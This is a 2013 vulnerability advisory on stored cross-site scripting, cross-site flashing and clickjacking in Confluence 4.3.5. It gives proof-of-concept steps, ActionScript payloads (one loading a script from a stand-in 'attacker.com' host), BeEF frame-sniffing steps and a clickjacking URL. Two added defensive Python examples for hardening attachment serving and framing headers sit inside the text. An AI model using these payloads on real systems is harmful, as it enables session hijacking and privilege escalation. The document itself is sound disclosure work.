Atlassian Confluence Multiple Vulnerabilities (DS-2013-005)

  • Affected Vendor: Atlassian
  • Affected Software: Confluence
  • Affected Version: 4.3.5. Other earlier versions may be affected.
  • Issue type: Cross-Site Scripting, Cross-Site Flashing, Click Jacking
  • Release Date: 11 July 2013
  • Discovered by: Andrew Horton, Sow Ching Shiong, Mahendra
  • Issue status: Patch available (unverified)

Summary

Security researchers Andrew Horton, Sow Ching Shiong and Mahendra discovered persistent cross-site scripting, persistent cross-site flashing, and insufficient framing protection vulnerabilities in Confluence version 4.3.5. The latest fully patched version of the application was used at the time of discovery.

The persistent cross-site scripting and cross-site flashing vulnerabilities enable an attacker with a user account on the Atlassian Confluence web application to craft a Confluence web page that hijacks the session of any user who visits it. An attacker can use this to elevate privileges from a basic user account to an administrative account once an administrative user visits the page.

The insufficient framing protection vulnerability enables an attacker without a user account to lure an authenticated user into following an untrusted link and clicking on a web page, thereby performing unwanted actions on the user's behalf. A harmless example is updating a user’s profile with new information.

Persistent Cross-site Scripting

The vulnerability is caused by insufficient controls in the application to prevent JavaScript contained in user-uploaded files from executing. When a user uploads a file as an attachment to a wiki page, the web application decides whether to render the file in-line based on the filename extension and the content-type supplied by the uploader. It is possible to bypass these controls and upload a file containing JavaScript that will execute in a user’s web browser.

Persistent Cross-site Flashing

The vulnerability exists because the application has a design flaw that allows Adobe Flash files to be uploaded, and Flash files can trigger JavaScript to be executed. Cross-site flashing vulnerabilities are similar in impact to cross-site scripting.

Insufficient Framing Protection

Framing involves placing one webpage within another webpage by use of the iframe HTML element. One familiar use of iframes is to embed maps within web pages. When a website is framed within another untrusted webpage, various attacks are possible including click jacking and frame sniffing.

Persistent Cross-site Scripting

Description

Cross-site scripting vulnerabilities exist when an attacker can cause arbitrary JavaScript to be included within a response from a web application. Persistent cross-site scripting occurs when the JavaScript payload is stored in the web application and presented to another user of the web application at a later time.

Throughout most of the Atlassian Confluence web application there is adequate user input validation and output sanitization to protect against cross-site scripting; however, the attachment upload functionality can be abused to perform this attack.

When a user uploads a file as an attachment to a wiki page, the web application chooses whether to render the content in-line or provide it as a downloadable file depending on the filename extension and the user-supplied content-type. HTML files are restricted from being rendered in-line. However, it is possible to bypass these controls and upload a file containing JavaScript content that will be rendered as HTML in the web browser. This is achieved by uploading a file whose name does not carry an “HTML” extension, and supplying a content-type set to something other than “text/html”.

Impact

This vulnerability can be used to perform unwanted actions on a user’s behalf, and to perform a session hijacking attack by injecting malicious JavaScript.

Affected products

This vulnerability was discovered in default installations of Confluence 4.3.5. Other earlier versions may also be affected.

Proof of concept

To demonstrate the persistent cross-site scripting, follow the steps below.

  • Create a file that contains a cross-site scripting payload such as the following example:
    <html><body><script>alert(1);</script></body></html>
  • Add an attachment to a wiki page.
  • Use your proxy software to intercept the POST request that uploads the attachment file. Alter the user-supplied content-type to a value other than “text/html” and ensure that the filename does not end in “.html”, as shown below.
  • Observe that the attached file has been uploaded.
  • Follow the attached file link and observe that cross-site scripting occurs.

Solution

Upgrade to Atlassian Confluence version 4.3.7. Note that Detica has not verified that this issue is resolved.

Persistent Cross-site Flashing

Description

Cross-site flashing vulnerabilities exist when an attacker can cause arbitrary JavaScript to be executed from within a Flash file in a web application. Persistent cross-site flashing occurs when the payload is stored in the web application and presented to another user of the web application at a later time.

The vulnerability is due to a design flaw in the application that allows Adobe Flash files to be uploaded, and Flash files can trigger JavaScript to be executed. Cross-site flashing vulnerabilities are similar in impact to cross-site scripting.

This vulnerability is more easily exploited than the persistent cross-site scripting vulnerability as the JavaScript can be automatically executed upon viewing a webpage on the wiki.

A variety of methods are available within the ActionScript language to execute JavaScript from within a Flash file. These methods include, but are not limited to, the following examples:

  • ExternalInterface.call("document.write","<script>alert(1)</script>");
  • navigateToURL(new URLRequest("Javascript: document.write(\"<script>alert(1)</scr\"+\"ipt>\")"),"_self")
  • ExternalInterface.call("eval","myWindow=window.open('','','width=200,height=100');myWindow.document.write(\"<html><head><script src=\'http://attacker.com/evil.js\'></script></head><body>hi</body></html>\");myWindow.focus()");
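Both issues above come down to the same server-side decision: the application lets the uploader's filename extension and declared content-type decide whether an attachment is rendered in-line, and it accepts SWF attachments at all. The following is an added example written for this advisory (not Confluence code) of a serving policy that makes that decision from the uploaded bytes instead. The allow-list in INLINE_SAFE, the UPLOAD_BLOCKED set and the function names are assumptions chosen for the example; the sample uploads are constructed and mirror the two cases the advisory describes plus a benign image.

```python
"""Attachment-serving policy that does not trust the uploader's filename or content-type.

Added example for this advisory, not Confluence code. Only an allow-list of sniffed
types is rendered in-line; HTML-like content and SWF are never rendered in the wiki's
origin, and every response carries X-Content-Type-Options: nosniff so the browser
cannot re-interpret the body as something else.
"""

# Sniffed types the server is willing to render in-line (assumed policy).
INLINE_SAFE = frozenset({"image/png", "image/jpeg", "image/gif", "application/pdf"})

# Types that are refused at upload time (assumed policy): an SWF can call back into
# the embedding page via ExternalInterface / navigateToURL, as the advisory shows.
UPLOAD_BLOCKED = frozenset({"application/x-shockwave-flash"})

# Magic-byte signatures checked against the start of the upload.
SIGNATURES = (
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"%PDF-", "application/pdf"),
    (b"FWS", "application/x-shockwave-flash"),   # uncompressed SWF
    (b"CWS", "application/x-shockwave-flash"),   # zlib-compressed SWF
    (b"ZWS", "application/x-shockwave-flash"),   # LZMA-compressed SWF
)

# Markers that make a body HTML-like regardless of extension or declared type.
HTML_MARKERS = (b"<!doctype", b"<html", b"<script", b"<body", b"<svg", b"<iframe")


def sniff(data: bytes) -> str:
    """Return the content type implied by the bytes themselves, never by the client."""
    for magic, ctype in SIGNATURES:
        if data.startswith(magic):
            return ctype
    head = data[:1024].lower()
    if any(marker in head for marker in HTML_MARKERS):
        return "text/html"
    return "application/octet-stream"


def accept_upload(filename: str, claimed_type: str, data: bytes) -> tuple:
    """Upload-time check: the declared type is recorded, but the sniffed type decides."""
    actual = sniff(data)
    if actual in UPLOAD_BLOCKED:
        return False, f"rejected: {actual} content is not allowed as an attachment"
    if actual != claimed_type:
        # A mismatch is noted for logging; serving will use the sniffed type anyway.
        return True, f"accepted: declared {claimed_type!r}, stored as {actual!r}"
    return True, f"accepted: {actual}"


def _header_safe_filename(filename: str) -> str:
    """Strip characters that could break out of the Content-Disposition header value."""
    kept = "".join(c for c in filename if c.isprintable() and c not in '"\\;')
    return kept[:255] or "download"


def serve_attachment(filename: str, claimed_type: str, data: bytes) -> dict:
    """Response headers for an attachment: in-line only for allow-listed sniffed types."""
    actual = sniff(data)
    name = _header_safe_filename(filename)
    headers = {"X-Content-Type-Options": "nosniff"}
    if actual in INLINE_SAFE:
        headers["Content-Type"] = actual
        headers["Content-Disposition"] = f'inline; filename="{name}"'
    else:
        # Anything active or unknown (HTML, SWF, octet-stream) is download-only.
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = f'attachment; filename="{name}"'
    return headers


# Constructed sample uploads: the advisory's two cases plus a benign image.
SAMPLES = {
    # The proof-of-concept HTML payload renamed to .txt with a non-HTML declared type.
    "notes.txt": ("text/plain", b"<html><body><script>alert(1);</script></body></html>"),
    # A constructed, truncated compressed-SWF header; only the magic matters here.
    "banner.swf": ("application/x-shockwave-flash", b"CWS\x0a\x00\x01\x00\x00" + b"\x00" * 8),
    # A constructed PNG header; only the magic matters to the sniffer.
    "logo.png": ("image/png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"),
}


def audit(samples=SAMPLES) -> dict:
    """Run both checks over the samples and return the decisions for inspection."""
    out = {}
    for name, (claimed, data) in samples.items():
        accepted, reason = accept_upload(name, claimed, data)
        out[name] = {"accepted": accepted, "reason": reason,
                     "headers": serve_attachment(name, claimed, data)}
    return out


if __name__ == "__main__":
    for name, decision in audit().items():
        print(name, decision)
```

With this policy the renamed HTML payload is stored but always returned as an `application/octet-stream` download, the SWF is refused at upload time, and the image still renders in-line. Serving attachments from a separate origin that holds no session cookie would be the complementary control, since a download-only policy still leaves the file reachable by URL.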

Impact

This vulnerability can be used to perform unwanted actions on a user’s behalf, and to perform a session hijacking attack by injecting malicious JavaScript.

Affected products

This vulnerability was discovered in default installations of Confluence 4.3.5. Other earlier versions may also be affected.

Proof of concept

To demonstrate the stored cross-site flashing, which is similar in impact to cross-site scripting, follow the steps below.

  • Create a new page in the wiki.
  • Add an attachment: upload an SWF file that triggers JavaScript. The ability to upload an SWF file to the web server is considered insecure in isolation.
  • Insert a media macro object into the wiki page.
  • Select the attachment you just uploaded as the media file to insert into the page.
  • Verify that the Flash object is embedded within the page.
  • Save the page and verify that the stored cross-site flashing occurs when the page is viewed. In this case, the SWF causes an alert box to pop up to demonstrate the ability to execute arbitrary JavaScript.

Solution

Upgrade to Atlassian Confluence version 4.3.7. Note that Detica has not verified that this issue is resolved.

Insufficient Framing Protection

Description

Framing involves placing one webpage within another webpage by use of the iframe HTML element. One familiar use of iframes is to embed maps within web pages.

When a website is framed within another untrusted webpage, various attacks are possible including click jacking and frame sniffing.

To perform a click jacking attack, an attacker must lure an authenticated user into following an untrusted link, then entice the user into clicking on the web page. The attacker sets up a web page that contains the Confluence web application within an invisible iframe. The user unwittingly clicks on a button or link within Confluence, causing an unwanted action. The iframe is made invisible by setting the CSS opacity property; it is placed on top of other elements by using the CSS z-index property, and it is lined up with a visible decoy button by using CSS absolute positioning.

Frame sniffing attacks require that a user be lured into following an untrusted link. The attack involves placing Confluence within an iframe, then attempting to scroll the iframe to various anchor names. The parent web page can determine whether the scrolling succeeded, which leaks details about the iframe’s content.
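Both attacks depend on one condition: the Confluence responses carry nothing that tells the browser who may frame them. The following is an added example written for this advisory (not Confluence code) that models the browser's framing decision from a response's headers and shows the headers that close the gap. It assumes `X-Frame-Options` and the CSP `frame-ancestors` directive as the controls; the function names, the `https://untrusted.example` origin and the UNPROTECTED header set are constructed for the example, and host-source matching is deliberately simplified to hostname comparison with a leading `*.` wildcard, ignoring ports and paths.

```python
"""Decide whether a response's headers allow an untrusted page to frame it, and harden them.

Added example for this advisory, not Confluence code. framing_allowed() models the
browser decision the framing attacks rely on: with neither X-Frame-Options nor a CSP
frame-ancestors directive, any origin may frame the page. harden() adds both headers
so that older (X-Frame-Options) and newer (CSP) browsers are covered.
"""
from urllib.parse import urlsplit


def _frame_ancestors(csp: str):
    """Return the frame-ancestors source list from a CSP value, or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def _host_source_matches(source: str, framer_origin: str) -> bool:
    """Simplified CSP host-source match: hostname only, '*.' wildcard honoured."""
    framer_host = (urlsplit(framer_origin).hostname or "").lower()
    host = source.split("://", 1)[-1].split("/", 1)[0].split(":", 1)[0]
    if host.startswith("*."):
        return framer_host.endswith(host[1:])
    return framer_host == host


def framing_allowed(headers: dict, framer_origin: str, site_origin: str) -> bool:
    """True if a page at site_origin served with these headers may be framed by framer_origin."""
    lowered = {k.lower(): v for k, v in headers.items()}
    ancestors = _frame_ancestors(lowered.get("content-security-policy", ""))
    if ancestors is not None:
        # When present, CSP frame-ancestors takes precedence over X-Frame-Options.
        if "'none'" in ancestors:
            return False
        if "'self'" in ancestors and framer_origin == site_origin:
            return True
        for src in ancestors:
            if src in ("'self'", "'none'"):
                continue
            if src == "*" or _host_source_matches(src, framer_origin):
                return True
        return False
    xfo = lowered.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return framer_origin == site_origin
    # No framing policy at all: the state the advisory describes.
    return True


def harden(headers: dict, allow_self: bool = True) -> dict:
    """Return a copy of headers with both anti-framing controls set.

    An existing CSP is extended rather than replaced, unless it already has frame-ancestors.
    """
    hardened = dict(headers)
    hardened["X-Frame-Options"] = "SAMEORIGIN" if allow_self else "DENY"
    directive = "frame-ancestors 'self'" if allow_self else "frame-ancestors 'none'"
    existing = hardened.get("Content-Security-Policy", "")
    if _frame_ancestors(existing) is None:
        hardened["Content-Security-Policy"] = f"{existing}; {directive}".strip("; ")
    return hardened


# Constructed inputs: the wiki origin from the advisory, a placeholder luring origin,
# and a response header set with no framing policy, as the advisory found it.
SITE = "https://host.local"
UNTRUSTED = "https://untrusted.example"
UNPROTECTED = {"Content-Type": "text/html;charset=UTF-8"}


def report() -> dict:
    """Compare the unprotected and hardened header sets against the two origins."""
    return {
        "unprotected_framable_by_untrusted": framing_allowed(UNPROTECTED, UNTRUSTED, SITE),
        "hardened_framable_by_untrusted": framing_allowed(harden(UNPROTECTED), UNTRUSTED, SITE),
        "hardened_framable_by_self": framing_allowed(harden(UNPROTECTED), SITE, SITE),
    }


if __name__ == "__main__":
    for name, value in report().items():
        print(f"{name}: {value}")
```

`SAMEORIGIN` / `frame-ancestors 'self'` keeps any legitimate self-framing the application does while refusing the luring page in both the click jacking and frame sniffing scenarios; `DENY` / `'none'` is the stricter choice where the application never frames itself. The same check can be run against captured response headers from a test instance to confirm the fix is actually deployed.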

Impact

Click jacking can be used to perform a limited set of unwanted actions on a user’s behalf. One example of an attack is to update a user’s profile with new information for fields such as ‘About Me’, and to update the user’s website link. This is made possible by the ability to populate form fields by setting URL parameters.

Frame sniffing can be used to elicit information from the Confluence web application; for example, it can be used to determine which of a set of company names are searchable using the Confluence search functionality.

Affected products

This vulnerability was discovered in default installations of Confluence 4.3.5. Other earlier versions may also be affected.

Proof of concept for Frame Sniffing

Note that some web browsers provide protection against frame sniffing. Testing was performed using the latest Firefox.

To exploit this issue, follow these steps:

  • Lure an authenticated user to a webpage that contains a BeEF (Browser Exploitation Framework) hook.
  • Use the iFrame Sniffer module.
    • Set the input URL to: https://host.local/dosearchsite.action?queryString=apple
    • Set the anchors to check to: search-results-body
  • Click Execute.
  • Check the response. If the anchor #search-results-body exists, then the search term ‘apple’ can be found within the Confluence web application.

A secondary exploit to determine whether a user is logged in:

  • Lure a user to a webpage that contains a BeEF (Browser Exploitation Framework) hook.
  • Use the iFrame Sniffer module.
    • Set the input URL to: https://host.local/login.action
    • Set the anchors to check to: forgot-password
  • Click Execute.
  • Check the response. If the anchor #forgot-password exists, then the user is not currently logged into the Confluence web application.

Proof of concept for Click Jacking

To exploit this issue, follow these steps:

  • Create a web page that contains the following URL in an iframe:
    • https://host.local/users/editmyprofile.action?personalInformation=I%20got%20clickjacked&userparam-website=http://phishing.com/
  • Set the CSS properties for the iframe to:
    • z-index:10; opacity:0;
  • Place an image on the web page underneath the ‘Save’ button.
  • Lure an authenticated Confluence user into following an untrusted link and clicking.

The screenshot below shows the ‘Save’ button as semi-opaque.

Solution

Upgrade to Atlassian Confluence version 4.3.7. Note that Detica has not verified that this issue is resolved.

Response timeline

  • 04/02/2013 - Vendor notified.
  • 04/02/2013 - Vendor acknowledges receipt of advisory.
  • 04/02/2013 - Vendor confirms issue presence and claims they were already aware of some of these issues at https://jira.atlassian.com/browse/CONF-27973.
  • 21/05/2013 - Vendor advises that these security issues are resolved on their bug tracking JIRA system at https://jira.atlassian.com/browse/CONF-27973.
  • 10/07/2013 - Detica has not verified the veracity of the vendor resolution.
  • 10/07/2013 - This advisory is published.

References

  • Vendor advisory: The vendor, Atlassian has chosen not to issue an advisory.